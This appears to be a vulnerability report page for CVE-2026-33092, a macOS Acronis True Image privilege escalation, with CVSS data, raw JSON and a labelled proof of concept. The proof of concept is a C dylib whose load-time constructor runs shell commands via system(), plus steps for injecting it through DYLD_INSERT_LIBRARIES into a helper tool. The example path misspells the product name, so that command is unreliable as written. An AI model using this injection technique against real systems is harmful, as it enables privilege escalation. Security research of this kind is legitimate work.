Security Vulnerability Report
CVE-2026-33092 CVSS 7.8 HIGH


Published: 2026-04-10 14:16:35
Last Modified: 2026-05-19 15:05:12

Description

Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Acronis True Image OEM (macOS) < build 42571
Acronis True Image (macOS) < build 42902

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Constructor function to execute code upon library load
__attribute__((constructor))
void run_at_load() {
    // Proof of Concept: Create a file owned by root
    system("echo 'CVE-2026-33092 PoC Executed' > /tmp/poc_success_root.txt");
    system("id >> /tmp/poc_success_root.txt");
}

/*
 * Compilation:
 * gcc -dynamiclib -o malicious.dylib malicious.c
 *
 * Exploitation Steps:
 * 1. Place the compiled malicious.dylib in a writable location (e.g., /tmp/).
 * 2. Set the DYLD_INSERT_LIBRARIES environment variable to point to the dylib.
 * 3. Trigger the vulnerable Acronis helper process.
 *
 * Example command:
 * export DYLD_INSERT_LIBRARIES=/tmp/malicious.dylib
 * /Applications/Acornis\ True\ Image.app/Contents/MacOS/HelperTool
 */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33092", "sourceIdentifier": "[email protected]", "published": "2026-04-10T14:16:34.880", "lastModified": "2026-05-19T15:05:11.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-15"}]}], "references": [{"url": "https://security-advisory.acronis.com/advisories/SEC-9407", "source": "[email protected]"}]}}